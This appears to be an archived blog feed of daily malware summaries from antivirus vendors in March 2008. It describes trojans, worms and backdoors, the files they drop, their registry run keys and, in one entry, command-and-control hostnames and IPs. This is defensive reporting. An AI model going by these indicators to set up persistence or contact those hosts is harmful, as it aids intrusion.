Virus Malware and Threat News for 20080331
W32/Sdbot.worm!3D1ACE0E - W32/Sdbot.worm!3D1ACE0E at McAfee
W32/Sdbot.worm!3D1ACE0E will connect to IRC server and scan the local LAN at port 445 to exploit other
vulnerable machines.The following possible URLs are accessed:dave.own.ccpoweronline.us:2345 (84.244.11.26)rusk.
nswebhost.com:80 tap.tronko.netserv-5-19-254.lycos-vds.com:2345 (84.244.19.254)serv-5-19-183.lycos-vds.com:
2345 (84.244.1...
Troj/Agent-GUO - Troj/Agent-GUO at Sophos
Troj/Agent-GUO is a Trojan for the Windows platform. When first run
Troj/Agent-GUO copies itself to <Windows>\help\F3C74E3FA248.exe and creates the following file:
<Windows>\help\F3C74E3FA248.dll The file F3C74E3FA248.dll is
detected as Mal/L...
Troj/PhpShell-G - Troj/PhpShell-G at Sophos
Troj/PhpShell-G is a backdoor Trojan for platforms supporting PHP.
Troj/PhpShell-G contains the following functionality: - reports the capabilities of the
PHP interpreter - discover database functions available to the current PHP install -
server IP addre...
Troj/PhpShell-H - Troj/PhpShell-H at Sophos
...
Troj/PhpShell-I - Troj/PhpShell-I at Sophos
...
Troj/PhpShell-J - Troj/PhpShell-J at Sophos
...
Troj/PhpShell-K - Troj/PhpShell-K at Sophos
...
Troj/PhpShell-L - Troj/PhpShell-L at Sophos
...
Troj/Zlob-AJN - Troj/Zlob-AJN at Sophos
...
Troj/Bifrose-VR - Troj/Bifrose-VR at Sophos
...
Troj/Starter-I - Troj/Starter-I at Sophos
...
0 writebacks [03/31/2008 05:42]
[]
permanent link
|
Virus Malware and Threat News for 20080330
W32.Launcer.A - W32.Launcer.A at Norton Symantec
W32.Launcer.A is a worm that spreads through removable drives and displays fake warnings that the operating
system on the compromised computer is pirated.
...
Troj/Bifrose-VQ - Troj/Bifrose-VQ at Sophos
...
Troj/Dropr-B - Troj/Dropr-B at Sophos
...
Troj/PWS-AQT - Troj/PWS-AQT at Sophos
...
Troj/Agent-GUM - Troj/Agent-GUM at Sophos
...
Troj/Dload-BX - Troj/Dload-BX at Sophos
...
W32/SillyFDC-CD - W32/SillyFDC-CD at Sophos
W32/SillyFDC-CD is a worm for the Windows platform. When first run
W32/SillyFDC-CD copies itself to <Windows>\kernelpr.dll and creates the following files:
<Windows>\myproc.dll (detected as W32/SillyFDC-CD) <Windows>\security\services.
exe (detected...
Troj/Agent-GUJ - Troj/Agent-GUJ at Sophos
Troj/Agent-GUJ is a Trojan for the Windows platform. When Troj/Agent-GUJ is
installed the following files are created: <System>\dll.dll (also detected as
Troj/Agent-GUJ) <System>\drivers\ipsys.sys (also detected as Troj/Agent-GUJ)
<Windows&...
Troj/Agent-GUK - Troj/Agent-GUK at Sophos
...
Troj/Agent-GUL - Troj/Agent-GUL at Sophos
Troj/Agent-GUL is a Trojan for the Windows platform. When first run
Troj/Agent-GUL copies itself to <Program Files>\WindowsService\msxpsrv.exe and creates the file
<Program Files>\WindowsService\klog.dat. The following registry entry is created
to run msxpsrv.exe o...
Troj/LdPinch-RQ - Troj/LdPinch-RQ at Sophos
Troj/LdPinch-RQ is a Trojan for the Windows platform. When first run
Troj/LdPinch-RQ copies itself to <Windows>\windows live\Messenger.exe. The
following registry entry is created to run Messenger.exe on startup:
HKLM\SOFTWARE\Microsoft\Active Setu...
0 writebacks [03/30/2008 05:43]
[]
permanent link
|
Virus Malware and Threat News for 20080329
Packed.Generic.61 - Packed.Generic.61 at Norton Symantec
Packed.Generic.61 is a heuristic detection for files that may have been obfuscated or encrypted in order to
conceal themselves from antivirus software.
...
W32.Tvido.B!inf - W32.Tvido.B!inf at Norton Symantec
W32.Tvido.B!inf is a virus that infects executable files on the compromised computer.
...
WORM_KELVIR.EI - WORM_KELVIR.EI at Trend Micro
This worm arrives on a system as a dropped file of other malware. It may also be downloaded unknowingly by a
user when visiting malicious Web sites.It drops a copy of itself and several non-malicious component files.
It also modifies the affected system's registry to ensure its automatic execution at every system startup.This
worm ...
RenameLoi.A - RenameLoi.A at Panda
It carries out several modifications in the Windows Registry, which prevent the computer from working properly.
It can modify Windows protected files, which could cause problems with the operating system. It spreads
through local, removable and mapped drives.
...
Nakuru.A - Nakuru.A at Panda
It modifies the Internet Explorer window title, changing it to the message Infected by GoKill ...^^v.... This
way, when the user opens a website with Internet Explorer, this message will be displayed in the window title.
It does not spread automatically by its own means.
...
Troj/Agent-GUI - Troj/Agent-GUI at Sophos
Troj/Agent-GUI is a Trojan for the Windows platform. Troj/Agent-GUI
includes functionality to access the internet and communicate with a remote server via HTTP.
When first run Troj/Agent-GUI copies itself to <User>\Application Data\<random name>.exe.
...
Troj/Dloadr-BJW - Troj/Dloadr-BJW at Sophos
Troj/Dloadr-BJW is a Trojan for the Windows platform. Troj/Dloadr-BJW
creates the following registry entry to start itself:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\advap32...
Troj/Dloadr-BJX - Troj/Dloadr-BJX at Sophos
...
Troj/FakeAle-AW - Troj/FakeAle-AW at Sophos
Troj/FakeAle-AW is a Trojan for the Windows platform. When first run
Troj/FakeAle-AW copies itself to <System>\sbwltbxa.exe and creates the file <System>\winfrun32.bin.
The file winfrun32.bin is not malicious and may be deleted. The Trojan may also drop
corrupt fil...
Troj/Nymod-A - Troj/Nymod-A at Sophos
Troj/Nymod-A is a Trojan for the Windows platform. Troj/Nymod-A includes
functionality to access the internet and communicate with a remote server. When
Troj/Nymod-A is run, it drops the file: <System>\^^^^^.exe - proactively detected
as Mal/Basi...
Mal/Agent-G - Mal/Agent-G at Sophos
Mal/Agent-G is a Trojan for the Windows platform.
...
Troj/Bckdr-QMS - Troj/Bckdr-QMS at Sophos
Troj/Bckdr-QMS is a backdoor Trojan which allows a remote intruder to gain access and control over
the computer. When first run Troj/Bckdr-QMS copies itself to <System>\wcbi.exe
and creates the file <System>\iaxcfg32.dll, which is a data file and can be safely deleted.
...
Troj/Dloadr-BJV - Troj/Dloadr-BJV at Sophos
Troj/Dloadr-BJV creates the following registry entry to start itself:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run advap32 <Current>\photo.exe"
/r...
Troj/Flood-IM - Troj/Flood-IM at Sophos
Troj/Flood-IM is a set of EXEs and DLLs that comprise a backdoor Trojan designed to be used as a
Distributed Denial of Service tool. When first run Troj/Flood-IM creates the following
files: <Windows>\edih.dll - detected as Troj/Flood-I
<System>\winnxp.h...
Troj/Lodok-A - Troj/Lodok-A at Sophos
Troj/Lodok-A is a Trojan for the Windows platform. When Troj/Lodok-A is
installed it creates the file <Program Files>\Microsoft Office\system\dodolook_7494.exe.
The file dodolook_7494.exe is detected as Mal/Generic-A. The file dodolook_7494.
exe is ...
0 writebacks [03/29/2008 05:42]
[]
permanent link
|
Virus Malware and Threat News for 20080328
Exploit:W32/JetDb.C - Exploit:W32/JetDb.C at F-Secure
This sample arrives together with a malicious MS Word document file as a package or attachment to email
messages. The specially crafted file exploits a known Remote Code Execution vulnerability on Microsoft Jet
Database Engine....
Trojan.Acdropper.C - Trojan.Acdropper.C at Norton Symantec
is a Trojan horse that drops Backdoor.Trojan and downloads potentially malicious code on to the compromised
computer....
W32.Imspread.Gen - W32.Imspread.Gen at Norton Symantec
W32.Imspread.Gen is a generic detection for the worm family that spreads through instant message programs. It
may download additional threats and open a back door.
...
PCClean - PCClean at Norton Symantec
BehaviorPCClean is a misleading application that may give exaggerated reports of threats on the computer.
...
PCAntiSpyware - PCAntiSpyware at Norton Symantec
BehaviorPCAntiSpyware is a misleading application that may give exaggerated reports of threats on the computer.
...
AntispyDeluxe - AntispyDeluxe at Norton Symantec
BehaviorAntispyDeluxe is a misleading application that may give exaggerated reports of threats on the computer.
...
MalwareWar - MalwareWar at Norton Symantec
BehaviorMalwareWar is a misleading application that may give exaggerated reports of threats on the computer.
...
W32/Kely.worm.gen - W32/Kely.worm.gen at McAfee
W32/Kely.worm.gen is a worm that can propagate via network shares and removable drives.Upon execution, it
copies itself to the following folders:C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\MSconfig.exeWinDir%\system\lsass.exe%WinDir%\lsass.exe(where %WinDir% is the default
Windows directory, for example C:\WINNT, ...
W32/Milam.worm - W32/Milam.worm at McAfee
This worm spreads via network shares and could allow an attacker with unauthorized remote access to the
compromised machine and the attacker can perform the following actions on this infected machine:Retrieve
system information Upload/Download files via HTTP/FTPExecute programs remotely Start and stop services Perform
DDOS...
JS/Exploit-ArcServe - JS/Exploit-ArcServe at McAfee
JS/Exploit-ArcServe is a generic detection for CA BrightStor ARCserve Backup ListCtrl ActiveX Control
buffer overflow vulnerability.The buffer overflow occurs while supplying a long string as a parameter to the
AddColumn function. This vulnerability could be exploited by a malicious user to cause remote code execution.
...
TROJ_MDROPPER.SN - TROJ_MDROPPER.SN at Trend Micro
...
JS_PSYME.BOU - JS_PSYME.BOU at Trend Micro
This malicious JavaScript (JS) script may be downloaded from a certain remote site.It takes advantage of
software vulnerabilities, which allows a remote malicious user or malware to download files on the affected
machine.It connects to a Web site to download a malicious file, which Trend Micro detects as TROJ_VUNDO.BHH.
As a result,...
Selex.B - Selex.B at Panda
It passes itself off as a download manager in order to deceive users and sends spam messages to the email
addresses obtained from the affected computer. It does not spread automatically by its own means.
...
Troj/Agent-GUF - Troj/Agent-GUF at Sophos
...
Troj/Agent-GUG - Troj/Agent-GUG at Sophos
...
Troj/Bifrose-VP - Troj/Bifrose-VP at Sophos
...
W32/Starter-H - W32/Starter-H at Sophos
...
Troj/Agent-GUE - Troj/Agent-GUE at Sophos
...
Troj/Bckdr-QMR - Troj/Bckdr-QMR at Sophos
...
Troj/DwnLdr-HBZ - Troj/DwnLdr-HBZ at Sophos
...
Troj/Spywad-AX - Troj/Spywad-AX at Sophos
Troj/Spywad-AX is a Trojan for the Windows platform. Troj/Spywad-AX
displays fake messages claiming the computer is infected with spyware and then tries to sell the user
antispyware tools. When Troj/Spywad-AX is run, the following files are created:
<...
Troj/BahnDl-Fam - Troj/BahnDl-Fam at Sophos
...
Troj/Oscor-M - Troj/Oscor-M at Sophos
Troj/Oscor-M is a backdoor Trojan for the Windows platform which allows a remote intruder to gain
access and control over the computer. Troj/Oscor-M creates a hidden instance of
Internet Explorer to communicate with the remote server via http POST messages. When
Troj/Oscor-M...
0 writebacks [03/28/2008 05:44]
[]
permanent link
|
Virus Malware and Threat News for 20080326
W32.Bancorkut@mm - W32.Bancorkut@mm at Norton Symantec
...
AntispySpider - AntispySpider at Norton Symantec
BehaviorAntispySpider is a misleading application that may give exaggerated reports of threats on the computer.
...
DCOMAssess - DCOMAssess at Norton Symantec
BehaviorDCOMAssess is a security assessment tool that scans remote computers for the Microsoft Windows DCOM
RPC Interface Buffer Overrun Vulnerability (BID 8205).
...
TROJ_AGENT.AAAS - TROJ_AGENT.AAAS at Trend Micro
This Trojan may be downloaded from remote sites by other malware. It may also be dropped by other malware.
When executed, it drops a non-malicious file on the system's Desktop. It then creates a certain registry key
as part of its installation routine. It also modifies registry entries to lower the settings of the Internet
Security...
W32/Sdbot-DKG - W32/Sdbot-DKG at Sophos
...
Troj/Agent-GTW - Troj/Agent-GTW at Sophos
...
Troj/Agent-ZLA - Troj/Agent-ZLA at Sophos
Troj/Agent-ZLA is a Trojan for the Windows platform. When first run
Troj/Agent-ZLA copies itself to <System>\Ir32_a.exe <System>\Ir32_b.exe
<System>\Ir32_c.exe and drops the following file: <System>\Vpe.dll,
which is dete...
Troj/Bckdr-QMQ - Troj/Bckdr-QMQ at Sophos
...
Troj/Bizves-F - Troj/Bizves-F at Sophos
Troj/Bizves-F is a Trojan for the Windows platform. Troj/Bizves-F is a backdoor Trojan
which allows a remote intruder to gain access and control over the computer.
Troj/Bizves-F includes functionality to download, install and run new software. When
first run Troj/Bi...
Troj/Dloadr-BJR - Troj/Dloadr-BJR at Sophos
...
Troj/Dwnldr-ZLE - Troj/Dwnldr-ZLE at Sophos
Troj/Dwnldr-ZLE is a Trojan for the Windows platform. Troj/Downldr-ZLE
downloads files from preconfigured URLs and runs them: Troj/Downldr-ZLE
creates registry entries: HKCU\Software\Microsoft\Windows\CurrentVersion\Settings
SN ...
Troj/Dwnldr-ZLI - Troj/Dwnldr-ZLI at Sophos
Troj/Dwnldr-ZLI is a Trojan for the Windows platform. Troj/Downldr-ZLI
downloads file from preconfigured URL to the following location and runs it: C:
\WINDOWS\svchost.exe...
Troj/Dwnldr-ZLJ - Troj/Dwnldr-ZLJ at Sophos
Troj/Dwnldr-ZLJ is a Trojan for the Windows platform. The following
registry entry is created to run <current filename>.exe on startup:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System <current filename>.exe
Tr...
Troj/Dwnldr-ZLK - Troj/Dwnldr-ZLK at Sophos
Troj/Dwnldr-ZLK is a Trojan for the Windows platform.
Troj/Downldr-ZLK downloads files from preconfigured URLs to the following locations:
<Windows system folder>\wm01.dll <Windows system folder>\wm.exe and runs wm.
exe. ...
0 writebacks [03/26/2008 09:42]
[]
permanent link
|
Virus Malware and Threat News for 20080325
Keylog-Nosiam - Keylog-Nosiam at McAfee
On execution, this program copies itself into the %windir%\system32 folder.This program creates a text file
called "system32.txt" in the %windir%\system32 folder.It then records the keystrokes into this file. The
recorded key strokes are encrypted.This trojan then connects to a remote server (uni[removed].com) to send the
recorded ke...
Troj/Banloa-FB - Troj/Banloa-FB at Sophos
Troj/Banloa-FB is a Trojan for the Windows platform. When first run
Troj/Banloa-FB copies itself to <Program Files>\Microsoft Studio Files\lsass.exe and creates the file
<Program Files>\Microsoft Studio Files\vcdg.bat.
...
Troj/DwnLdr-HBW - Troj/DwnLdr-HBW at Sophos
...
W32/SillyFD-R - W32/SillyFD-R at Sophos
W32/SillyFD-R is a worm for the Windows platform. When first run
W32/SillyFD-R copies itself to: <System>\autochl.exe
<System>\config\system.exe <System>\dllcache\log.exe <System>\lap.exe
<System>\sserve...
W32/Spybot-OI - W32/Spybot-OI at Sophos
...
Troj/Bckdr-QMP - Troj/Bckdr-QMP at Sophos
...
Troj/LowZone-EA - Troj/LowZone-EA at Sophos
...
W32/Rbot-GWP - W32/Rbot-GWP at Sophos
W32/Rbot-GWP is a worm with IRC backdoor functionality for the Windows platform.
W32/Rbot-GWP runs continuously in the background, providing a backdoor server which allows a remote
intruder to gain access and control over the computer via IRC channels. W32/Rbot-GWP
includes fu...
Troj/Bckdr-QMO - Troj/Bckdr-QMO at Sophos
...
Troj/AspShell-A - Troj/AspShell-A at Sophos
Troj/AspShell-A is an ASP-based backdoor Trojan.
Troj/AspShell-A is
normally found on compromised webservers.
...
Troj/Keygen-BS - Troj/Keygen-BS at Sophos
Troj/Keygen-BS is a key-generator application for the Windows platform.
...
0 writebacks [03/25/2008 09:42]
[]
permanent link
|
Virus Malware and Threat News for 20080324
TROJ_DLOADER.HGS - TROJ_DLOADER.HGS at Trend Micro
This Trojan may be downloaded from remote sites by other malware. It may be dropped by other malware. It may
be downloaded unknowingly by a user when visiting malicious Web sites.It drops a non-malicious file.Upon
execution, it accesses a certain URL to download a malicious file detected by Trend Micro as Mal_Banker.It
then executes ...
BKDR_AGENT.NOZ - BKDR_AGENT.NOZ at Trend Micro
This backdoor may be dropped by other malware.It may be downloaded unknowingly by a user when visiting
malicious Web site(s).It creates a folder and drops a non-malicious file. It creates a registry entry to
enable its automatic execution at every system startup. It also creates a registry key and entry.This backdoor
opens a random p...
BKDR_IRCBOT.GP - BKDR_IRCBOT.GP at Trend Micro
This backdoor may be downloaded from remote site(s) by other malware. It may be dropped by other malware. It
may be downloaded unknowingly by a user when visiting malicious Web site(s).It drops a copy of itself,
terminates the initially executed copy, and executes the dropped copy. The dropped copy is set to Read-only,
Hidden, and Sy...
TROJ_MSJET.C - TROJ_MSJET.C at Trend Micro
...
TROJ_ACCDROP.E - TROJ_ACCDROP.E at Trend Micro
...
TROJ_EMBED.AA - TROJ_EMBED.AA at Trend Micro
...
Troj/Agent-GTR - Troj/Agent-GTR at Sophos
...
Mal/WSPDll-A - Mal/WSPDll-A at Sophos
Mal/WSPDll-A displays characteristics unique to the DLL dropped by Troj/WSPatch-A.
...
Troj/Dloadr-BJQ - Troj/Dloadr-BJQ at Sophos
...
Troj/PDFex-E - Troj/PDFex-E at Sophos
Troj/PDFex-E is a Trojan for the Windows platform that exploits a vulnerability in Adobe Acrobat
and Acrobat reader to drop malicious files. When Troj/PDFex-E is run the following
files are created: - Flate0022 - detected as Mal/JSShell-A - <Root>\a.
exe - det...
Mal/EncPk-CW - Mal/EncPk-CW at Sophos
Mal/EncPk-CW is a program packed with a protection system typically used by malware authors.
Files detected as Mal/EncPk-CW are usually password-stealing Trojans.
...
Troj/Bckdr-QMM - Troj/Bckdr-QMM at Sophos
Troj/Bckdr-QMM is a Trojan for the Windows platform. Troj/Bckdr-QMM runs
continuously in the background, providing a backdoor server which allows a remote intruder to gain access and
control over the computer via IRC channels. When first run Troj/Bckdr-QMM copies itself
to <...
Troj/DNSChan-MH - Troj/DNSChan-MH at Sophos
Troj/DNSChan-MH is a Trojan for the Windows platform. Troj/DNSChan-MH
redirects accesses to certain websites by adding entries to the file C:
\WINDOWS\system32\drivers\etc\hosts...
Troj/WSPatch-A - Troj/WSPatch-A at Sophos
Troj/WSPatch-A is a Trojan for the Windows platform. When Troj/WSPatch-A is
installed the following files are created: <Current Folder>\803201627461002--ss.
jpg <Current Folder>\803201703461002--ss.jpg <Current
Folder>\803201703471002--ss...
0 writebacks [03/24/2008 09:45]
[]
permanent link
|
Virus Malware and Threat News for 20080323
WORM_AUTORUN.BT - WORM_AUTORUN.BT at Trend Micro
...
BKDR_AGENT.AU - BKDR_AGENT.AU at Trend Micro
...
BKDR_SINOWAL.BE - BKDR_SINOWAL.BE at Trend Micro
...
TROJ_DROPPER.KUZ - TROJ_DROPPER.KUZ at Trend Micro
...
TROJ_MSPPOINT.AE - TROJ_MSPPOINT.AE at Trend Micro
...
TROJ_DROPPER.ACD - TROJ_DROPPER.ACD at Trend Micro
...
Troj/Banhost-J - Troj/Banhost-J at Sophos
Troj/Banhost-J is a Trojan for the Windows platform. Troj/Banhost-J modifies the
<System>\drivers\etc\hosts file so that attempts to visit certain banking websites will get redirected
to a malicious server.
...
Troj/Banhost-K - Troj/Banhost-K at Sophos
Troj/Banhost-K is a Trojan for the Windows platform. Troj/Banhost-K
modifies the <System>\drivers\etc\hosts file so that attempts to visit certain banking websites will get
redirected to a malicious server.
...
Troj/DwnLdr-HBU - Troj/DwnLdr-HBU at Sophos
...
Troj/DwnLdr-HBV - Troj/DwnLdr-HBV at Sophos
...
Troj/IRCBot-AAT - Troj/IRCBot-AAT at Sophos
...
Troj/Lineag-DJ - Troj/Lineag-DJ at Sophos
...
Troj/Lineag-DK - Troj/Lineag-DK at Sophos
...
Troj/Agent-GTQ - Troj/Agent-GTQ at Sophos
...
Troj/Bckdr-QML - Troj/Bckdr-QML at Sophos
...
Troj/FakeAle-AV - Troj/FakeAle-AV at Sophos
...
0 writebacks [03/23/2008 09:41]
[]
permanent link
|
Virus Malware and Threat News for 20080322
Troj/Zlob-AJK - Troj/Zlob-AJK at Sophos
...
W32/IRCBot-AAS - W32/IRCBot-AAS at Sophos
W32/IRCBot-AAS is a worm with IRC backdoor functionality for the Windows platform.
W32/IRCBot-AAS runs continuously in the background, providing a backdoor server which allows a remote
intruder to gain access and control over the computer via IRC channels. When first run
W32/I...
Troj/Agent-GTN - Troj/Agent-GTN at Sophos
Troj/Agent-GTN is a Trojan for the Windows platform. When Troj/Agent-GTN is
installed the following files are created: <System>\hrpdcf.bin (harmless data
file, can be deleted) <System>\mp3res.dll (detected as Troj/Agent-GTN)
<System>\xpr...
Troj/Mdrop-BQY - Troj/Mdrop-BQY at Sophos
Troj/Mdrop-BQY is a Trojan dropper for the Windows platform. Troj/Mdrop-BQY
is a Microsoft Excel document that typically arrives as an email attachment (the subject and message text of
these email messages vary widely). Troj/Mdrop-BQY attempts to exploit a known
vulnerability ...
W32/SillyFDC-CC - W32/SillyFDC-CC at Sophos
...
Troj/Dloadr-BJP - Troj/Dloadr-BJP at Sophos
Troj/Dloadr-BJP is a Trojan for the Windows platform. Troj/Dloadr-BJP
includes functionality to download, install and run new software.
...
Troj/Mdrop-BQX - Troj/Mdrop-BQX at Sophos
Troj/Mdrop-BQX is a Trojan dropper for the Windows platform. Troj/Mdrop-BQX
is a Microsoft Word document that typically arrives as an email attachment (the subject and message text of
these email messages vary widely). Troj/Mdrop-BQX attempts to exploit a known
vulnerability a...
Troj/Sanji-A - Troj/Sanji-A at Sophos
Troj/Sanji-A is a backdoor Trojan for the Window platform which allows a remote intruder to gain
access and control over the computer. Troj/Sanji-A may be installed by a Trojan such as
Troj/Mdrop-BQX. Trojans such as Troj/Mdrop-BQX are Microsoft Office files (PowerPoint, Word, Access or Excel)
that ...
Troj/Agent-GTO - Troj/Agent-GTO at Sophos
Troj/Agent-GTO is a Trojan for the Windows platform. Troj/Agent-GTO
includes functionality to access the internet and communicate with a remote server via HTTP.
When Troj/Agent-GTO is installed the following file is created (also detected as Troj/Agent-GTO):
...
Troj/Agent-GTP - Troj/Agent-GTP at Sophos
...
0 writebacks [03/22/2008 09:42]
[]
permanent link
|
Virus Malware and Threat News for 20080321
Troj/Agent-GTL - Troj/Agent-GTL at Sophos
Troj/Agent-GTL is a Trojan for the Windows platform. Troj/Agent-GTL
intercepts network traffic for the infected computer. Troj/Agent-GTL copies itself onto
removable storage devices such as USB keys that are inserted into the infected computer.
Troj/Ag...
Troj/Agent-GTM - Troj/Agent-GTM at Sophos
...
Troj/Dloadr-BJN - Troj/Dloadr-BJN at Sophos
...
Troj/FakeAV-E - Troj/FakeAV-E at Sophos
Troj/FakeAV-E is a Trojan for the Windows platform. Troj/FakeAV-E
fraudulently reports a users system as infected and will not clean up these fraudulent reports until the users
pays and registers the application.
...
Troj/Prorat-DP - Troj/Prorat-DP at Sophos
...
Troj/PWS-AQR - Troj/PWS-AQR at Sophos
...
Troj/Zlob-AJJ - Troj/Zlob-AJJ at Sophos
...
W32/Kobak-A - W32/Kobak-A at Sophos
...
VBS/Psyme-HT - VBS/Psyme-HT at Sophos
...
Mal/Zlob-L - Mal/Zlob-L at Sophos
...
Spyware.OsMonitor - Spyware.OsMonitor at Norton Symantec
BehaviorSpyware.OsMonitor is a spyware program that may monitor and restrict user activities on the Internet.
...
Bloodhound.Exploit.182 - Bloodhound.Exploit.182 at Norton Symantec
Bloodhound.Exploit.182 is a heuristic detection for files attempting to exploit the RealNetworks RealPlayer
'rmoc3260.dll' ActiveX Control Memory Corruption Vulnerability (BID 28157).
...
Snipher - Snipher at Norton Symantec
BehaviorSnipher is a security assessment tool used to monitor network traffic.
...
0 writebacks [03/21/2008 09:44]
[]
permanent link
|
Virus Malware and Threat News for 20080320
Trojan.Dronjaga - Trojan.Dronjaga at Norton Symantec
Trojan.Dronjaga is a Trojan horse that attempts to download potentially malicious files on to the compromised
computer. It also prevents the compromised computer from restarting.
...
Spyware.PCAgent - Spyware.PCAgent at Norton Symantec
BehaviorSpyware.PCAgent is a spyware program that records keystrokes from the computer.
...
Adware.Rabio - Adware.Rabio at Norton Symantec
BehaviorAdware.Rabio is an adware program that installs itself as a Browser Helper Object and displays
advertisements....
0 writebacks [03/20/2008 09:44]
[]
permanent link
|
Virus Malware and Threat News for 20080319
Trojan:W32/MonaGray.A - Trojan:W32/MonaGray.A at F-Secure
Trojan:W32/MonaGray.A is a trojan horse that attempts trick victims into downloading a misleading application
called Unigray Antivirus. Unigray Antivirus is a "rogue" product and is detected as Rogue:W32/Unigray.A.
...
Worm:SymbOS/Beselo.A - Worm:SymbOS/Beselo.A at F-Secure
Beselo.A is an MMS and Bluetooth worm that operates on Symbian S60 Second Edition devices. Beselo.A spreads
via MMS messages and Bluetooth using the filenames beauty.jpg, sex.mp3, or love.rm.
...
Suspicious:W32/Malware!Gemini - Suspicious:W32/Malware!Gemini at F-Secure
Suspicious:W32/Malware!Gemini is a HIPS detection made the F-Secure scanning engine used by Virustotal.
Virustotal is a website to which files may be submitted for scanning by multiple antivirus engines.
...
Backdoor:PHP/Obfu - Backdoor:PHP/Obfu at F-Secure
Obfu is a family of PHP backdoors that operate on any PHP enabled system. The variants belonging to this
family are usually heavily obfuscated to prevent an outright detection of their functionality.
...
Trojan:SymbOS/Kiazha - Trojan:SymbOS/Kiazha at F-Secure
Kiazha is a trojan that operates on Symbian Series 60 2nd Edition devices. Trojan:SymbOS/Kiazha is a trojan
that attempts to ransom money from the user of the device. It is distributed as a component of Trojan:
SymbOS/MultiDropper.A.
...
Trojan-Spy:W32/Zbot.GO - Trojan-Spy:W32/Zbot.GO at F-Secure
Trojan-Spy:W32/Zbot.GO is a trojan that attempts to steal online banking login-information and other sensitive
data from the infected computer.
...
Trojan:SymbOS/MultiDropper - Trojan:SymbOS/MultiDropper at F-Secure
Multidropper is a trojan-dropper that operates on Symbian Series 60 2nd Edition devices. It drops and runs
other malware components on the compromised device.
...
Trojan-Downloader:W32/Agent.BRK - Trojan-Downloader:W32/Agent.BRK at F-Secure
Trojan-Downloader:W32/Agent.BRK attempts to download and install other malware onto the affected system.
...
Worm:VBS/AutoRun.B - Worm:VBS/AutoRun.B at F-Secure
Worm:VBS/AutoRun.B is a worm that spreads by copying itself to local hard drives, network drives, and
removable drives. It has no other functionality.
...
Trojan-Downloader:W32/Small.HSG - Trojan-Downloader:W32/Small.HSG at F-Secure
Trojan-Downloader:W32/Small.HSG downloads and runs a file that is detected as Trojan-Downloader.Win32.Agent.
HQL. This normally arrives as a dropped file by other malware or is downloaded unsuspectingly by the user
from a malicious website.
...
Trojan-Downloader:W32/Agent.JRY - Trojan-Downloader:W32/Agent.JRY at F-Secure
Agent.JRY connects to a website to download additional malware, as well as opens a legitimate PDF file from a
legitimate site....
Trojan-Spy:W32/Agent.BNP - Trojan-Spy:W32/Agent.BNP at F-Secure
Trojan-Spy:W32/Agent.BNP is a banker trojan that attacks the two-way authentication commonly used in banking
systems....
Trojan:SymbOS/SrvSender - Trojan:SymbOS/SrvSender at F-Secure
Trojan:SymbOS/SrvSender affects Symbian Series 60 Second Edition devices. SrvSender responds to all incoming
messages and phone calls with a random SMS message and removes all traces of some incoming messages.
...
Trojan-Dropper:W32/Agent.DSM - Trojan-Dropper:W32/Agent.DSM at F-Secure
It has come to our attention that certain executable files related to Google Earth's installation are falsely
detected by F-Secure Anti-Virus as "Trojan-Dropper.Win32.Agent.DSM" with the anti-virus updates published on
January 21, 2008. The false alarm issue will be addressed with update 2008-01-21_02. We are very sorry for
any poss...
Commwarrior - Commwarrior at F-Secure
Commwarrior is a worm that operates on Symbian Series 60 2nd Edition devices. The worm is capable of
spreading itself via Bluetooth and MMS.
...
Backdoor:Linux/Meche - Backdoor:Linux/Meche at F-Secure
The Backdoor:Linux/Meche family covers a wide base of variants that are based on the EnergyMech IRC bot. The
bot is widely used by miscreants to compromise Linux installations.
...
Worm:SymbOS/Beselo - Worm:SymbOS/Beselo at F-Secure
Beselo is a MMS and Bluetooth worm family that operates on Symbian S60 Second Edition devices. The Beselo
family is very similar to the Commwarrior family but contains enough differences in the code base and behavior
that it is counted as separate family.
...
Backdoor:W32/Agent.CTH - Backdoor:W32/Agent.CTH at F-Secure
Backdoor:W32/Agent.CTH is a backdoor that can steal information. Stolen information is sent to a collection
site using an HTTP POST command.
...
JS/Advedo - JS/Advedo at F-Secure
JS/Advedo is part of a multi-stage malware that is written in JScript and VBS. This script Trojan is injected
into several legitimate websites and uses several other scripts to ultimately allows a file to be downloaded
into the infected system. The downloaded file is executed afterwards.
...
Trojan:W32/Agent.EDY - Trojan:W32/Agent.EDY at F-Secure
Trojan:W32/Agent.EDY is a standalone trojan dropper. It drops two EXE files on the computer.
...
Trojan:WinCE/InfoJack - Trojan:WinCE/InfoJack at F-Secure
Trojan:WinCE/InfoJack a trojan effecting Windows Mobile devices.
...
Worm:W32/AutoRun.BV - Worm:W32/AutoRun.BV at F-Secure
Worm:W32/AutoRun.BV is a worm that propagates by dropping copies of itself on shared and removable drives. It
has the appearance of a document file used for stealth purposes.
...
Backdoor:W32/PoisonIvy - Backdoor:W32/PoisonIvy at F-Secure
Backdoor:W32/PoisonIvy is a family of backdoors that give a remote user extensive access to an infected
computer....
Trojan:SymbOS/Remover.A - Trojan:SymbOS/Remover.A at F-Secure
Remover.A is a Trojan which attempt to remove all files from the phone on C: and E: drives.
...
Trojan-Downloader:W32/Injecter.GX - Trojan-Downloader:W32/Injecter.GX at F-Secure
Injecter.GX is a trojan-downloader. A trojan-downloader is usually a standalone program that attempts to
silently download and run other files from remote Web and FTP sites.
...
Backdoor:W32/Hupigon - Backdoor:W32/Hupigon at F-Secure
Backdoor:W32/Hupigon is a family of backdoor trojans. It allows a remote user access to the computer.
...
Trojan-Spy:W32/Banker.ICS - Trojan-Spy:W32/Banker.ICS at F-Secure
This is a trojan banking spyware which modifies or deform the original Banking website by injecting additional
html codes. Other capabilities of this malware is KEYLOGGING, Logging the User Movement in the Website and
implements a technique to keylog on some website that it track that are using virtual keypad. This malware
communicat...
Worm:VBS/HeadTail.A - Worm:VBS/HeadTail.A at F-Secure
This Visual Basic Script worm propagates by copying itself to available removable, fixed, and remote drives;
creating an autorun.ini script to enable its execution. Whenever the specified drive is accessed in the
systems with Drive Type Autorun Enabled settings, the malware will automatically execute itself.
...
Trojan-Downloader:W32/Agent.EOA - Trojan-Downloader:W32/Agent.EOA at F-Secure
Trojan-Downloader:W32/Agent.EOA was initially associated with the recent PDF exploit Malware run (October
2007), detected as Exploit:W32/AdobeReader, Agent.EOA normally arrives as a dropped/downloaded Malware
component by other Malware running on the infected system. The November 2007 and latest, the January 2008
reports however, now...
